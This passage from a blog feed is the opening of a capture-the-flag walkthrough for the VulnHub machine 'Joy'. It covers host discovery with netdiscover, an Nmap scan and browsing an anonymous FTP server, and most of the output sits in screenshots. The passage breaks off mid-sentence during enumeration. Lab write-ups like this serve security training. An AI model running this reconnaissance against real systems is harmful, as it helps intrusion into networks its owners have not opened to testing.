width="72"/></entry><entry><id>tag:blogger.com,1999:blog-1947953814412763707.post-4952825075184822669</id><published>2021-11-13T10:24:00.007-06:00</published><updated>2021-12-17T13:12:58.166-06:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="CAPTURE THE FLAG -   VULNERABLE MACHINES"/><title type='text'>Joy</title><content type='html'>&lt;p&gt;&lt;b&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span style=&quot;color: #6fa8dc;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;JOY&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Layout for this exercise:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjof621gw_dR-DSMnAu3tO7L65rN73BP8L1Qd2qFZlFY2JU5AdZAdTBdzzeurhPdZRiSSAcVe_Ftxgm7B2LHw_RUQOKt1iuQ69SdD5Rxo2K-9pfzN-ImroiyXt7jLUq0V_2gS-BKzTeWBLP/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;219&quot; data-original-width=&quot;634&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjof621gw_dR-DSMnAu3tO7L65rN73BP8L1Qd2qFZlFY2JU5AdZAdTBdzzeurhPdZRiSSAcVe_Ftxgm7B2LHw_RUQOKt1iuQ69SdD5Rxo2K-9pfzN-ImroiyXt7jLUq0V_2gS-BKzTeWBLP/s16000/screenshot.2.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;1 - INTRODUCTION&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;div style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- The goal of this exercise is to develop a hacking process for the vulnerable machine&amp;nbsp;&lt;b&gt;Joy&lt;/b&gt;&amp;nbsp;from the VulnHub pentesting platform.&lt;/span&gt;&lt;/div&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div style=&quot;background-color: white;&quot;&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;-&amp;nbsp;&lt;b&gt;Joy&lt;/b&gt;&amp;nbsp;can be downloaded from here:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;&lt;p&gt;&lt;a href=&quot;https://www.vulnhub.com/entry/digitalworldlocal-joy,298/&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;https://www.vulnhub.com/entry/digitalworldlocal-joy,298/&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;span&gt;- Once downloaded &lt;/span&gt;&lt;b&gt;Joy&lt;/b&gt;&lt;span&gt; and extracted with VMware:&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjz_TYoz8aNJfRRFDfY-GtnbNeWkz8uFbFZpLb49rQuPoMhCBNOmOEjrI1qOCqBHgdBIYa2vh7Fqj_JPecwl9NCXymRpikRWXQYtfYUJyla7tEl0PZjnAz3P5W9LaUszf6uEM95w91GO9NY/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;428&quot; data-original-width=&quot;592&quot; height=&quot;289&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjz_TYoz8aNJfRRFDfY-GtnbNeWkz8uFbFZpLb49rQuPoMhCBNOmOEjrI1qOCqBHgdBIYa2vh7Fqj_JPecwl9NCXymRpikRWXQYtfYUJyla7tEl0PZjnAz3P5W9LaUszf6uEM95w91GO9NY/w400-h289/screenshot.1.jpg&quot; width=&quot;400&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&lt;span style=&quot;color: #6fa8dc; font-size: medium;&quot;&gt;&lt;b&gt;2 - ENUMERATION&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- netdiscover helps to identify &lt;b&gt;Joy&lt;/b&gt;&#39;s IP 192.168.1.23:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYdBzXZrjcmcR483RNu6Bz_va3gmVgppT5qm8t8agivDDgzbwlDIyfEeBR0U6UEojQZFgAtGJ5-oMg0-D8OLRVXfymfNQwI10fam0ckrYTcykhTnnNY3wc3hAl5obS1VT5bfVjKL4ZKNsF/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;28&quot; data-original-width=&quot;522&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYdBzXZrjcmcR483RNu6Bz_va3gmVgppT5qm8t8agivDDgzbwlDIyfEeBR0U6UEojQZFgAtGJ5-oMg0-D8OLRVXfymfNQwI10fam0ckrYTcykhTnnNY3wc3hAl5obS1VT5bfVjKL4ZKNsF/s16000/screenshot.28.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFKlj3jHbmMO7CVQUxCkhEIRgHl_m4NT6oxxXax6mY-owtsKwDdGoTTiA_zCpSiO_1nAFYTYxn0PtmuPLlWOJaXK7EdzyBRp0v4rguR9XEmhp429mVUSzw5O2YCQCXPTq74ZHhcgJYSZYz/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;266&quot; data-original-width=&quot;824&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFKlj3jHbmMO7CVQUxCkhEIRgHl_m4NT6oxxXax6mY-owtsKwDdGoTTiA_zCpSiO_1nAFYTYxn0PtmuPLlWOJaXK7EdzyBRp0v4rguR9XEmhp429mVUSzw5O2YCQCXPTq74ZHhcgJYSZYz/s16000/screenshot.27.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Scanning with Nmap:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFoL6vUYUYJcJ6_VnCyZlz9k0eKPFIGewMUd9h1aY5gpX8kCbPsthZrDNgnPtetNSiV6kYvebe7wmB7vAZVl06yfyJOh6KJR36BD5xm0t-Wn2BRGlrx3umD18HM3-FzPTthpvM_w7-VF-2/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;448&quot; data-original-width=&quot;435&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFoL6vUYUYJcJ6_VnCyZlz9k0eKPFIGewMUd9h1aY5gpX8kCbPsthZrDNgnPtetNSiV6kYvebe7wmB7vAZVl06yfyJOh6KJR36BD5xm0t-Wn2BRGlrx3umD18HM3-FzPTthpvM_w7-VF-2/s16000/screenshot.29.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Scanning deeper port 21 we discover Anonymous FTP server and two folders, &lt;b&gt;download&lt;/b&gt; and &lt;b&gt;upload&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdwFngFYpHifa9af7r4vhXWHQJXb5KwCnqFOSHmwllOSj7Cl0j8WAWM4xwbTAcbl9XtcWlFyZxVTAGGyV-sBbQ5HEJTjI_eU-QMSZeND1GCnjXOv_TyWPJEsmUyIsQoHRn9IprM4F_FBB7/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;422&quot; data-original-width=&quot;724&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdwFngFYpHifa9af7r4vhXWHQJXb5KwCnqFOSHmwllOSj7Cl0j8WAWM4xwbTAcbl9XtcWlFyZxVTAGGyV-sBbQ5HEJTjI_eU-QMSZeND1GCnjXOv_TyWPJEsmUyIsQoHRn9IprM4F_FBB7/s16000/screenshot.30.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzNxh7m7OukWfPkJdn9ajwv4KRC6mkBaNsSt8sDgjqkrJYrKz6fur18CmOTHpZbWHAMY5-5FAjLXoR-o6heHuEbb69gsyo_ClF2Gy3cA76VGu_uMb-C5xIJAgJX4P8uPf9pa_J18j7ybwj/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;409&quot; data-original-width=&quot;742&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzNxh7m7OukWfPkJdn9ajwv4KRC6mkBaNsSt8sDgjqkrJYrKz6fur18CmOTHpZbWHAMY5-5FAjLXoR-o6heHuEbb69gsyo_ClF2Gy3cA76VGu_uMb-C5xIJAgJX4P8uPf9pa_J18j7ybwj/s16000/screenshot.31.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- &lt;b&gt;download&lt;/b&gt; seems to be empty, however &lt;b&gt;upload&lt;/b&gt; gives a lot of information:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7e86fk_Fj-3QGNEUf2_MqCBYNEG3NgQyRJl9UgTStyCF_fbsaUCf_RY-1qpoLcWVbAsMUte7RJBZJIdNZWj9BhyIwdOWuIQ4WbOUABITbW3xDxWPGzhPTRjEtZ_uvHxgueQ8s80G1Nhbn/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;874&quot; data-original-width=&quot;735&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7e86fk_Fj-3QGNEUf2_MqCBYNEG3NgQyRJl9UgTStyCF_fbsaUCf_RY-1qpoLcWVbAsMUte7RJBZJIdNZWj9BhyIwdOWuIQ4WbOUABITbW3xDxWPGzhPTRjEtZ_uvHxgueQ8s80G1Nhbn/s16000/screenshot.32.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Connecting to the FTP server:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhoFNxQDS1UztNpwmRDLszEnJN4ZdNIukfahTaqDoqHqQ_NBTFml-ACTXSNkHI_TweRUGO2Iow7AxbgJG_jPFVCU2bmkbqd4yPWqWwm0g4HDmqZJeF96tXOFhi7uiHo43Xu40zdhrAOpSSA/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;238&quot; data-original-width=&quot;826&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhoFNxQDS1UztNpwmRDLszEnJN4ZdNIukfahTaqDoqHqQ_NBTFml-ACTXSNkHI_TweRUGO2Iow7AxbgJG_jPFVCU2bmkbqd4yPWqWwm0g4HDmqZJeF96tXOFhi7uiHo43Xu40zdhrAOpSSA/s16000/screenshot.33.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Going to &lt;b&gt;upload&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6xQgdKaL7ATRsGQG3s4xIk_1N8D3zv0rrMbqouRCJjWPCVWph4cki73o0m3Xs2gYo7An7GNgnrdmQAg21VQ9eDP3bfQFgOXKbjhhFnT_Lq4agZP7JP-xi3_xjo6aRtnTojOHCZrxhAIqJ/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;669&quot; data-original-width=&quot;837&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6xQgdKaL7ATRsGQG3s4xIk_1N8D3zv0rrMbqouRCJjWPCVWph4cki73o0m3Xs2gYo7An7GNgnrdmQAg21VQ9eDP3bfQFgOXKbjhhFnT_Lq4agZP7JP-xi3_xjo6aRtnTojOHCZrxhAIqJ/s16000/screenshot.34.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;- Getting &lt;b&gt;directory&lt;/b&gt;:&lt;/span&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvWqd5VpSuUxhVN34WkWHx-rBvU9ZkOClsU_YtxZu0C9crTQdxFTQwW2ZvHvkvKWCUtSxXea9QqQoPJPxYiBP8_hOP-tN-JyYLOaQJ161SDPd7k_k5BYn4BT0LdG-e3a1fUkf8j4pVk-vo/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;141&quot; data-original-width=&quot;759&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvWqd5VpSuUxhVN34WkWHx-rBvU9ZkOClsU_YtxZu0C9crTQdxFTQwW2ZvHvkvKWCUtSxXea9QqQoPJPxYiBP8_hOP-tN-JyYLOaQJ161SDPd7k_k5BYn4BT0LdG-e3a1fUkf8j4pVk-vo/s16000/screenshot.35.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Reading &lt;b&gt;directory&lt;/b&gt; there are a lof of files 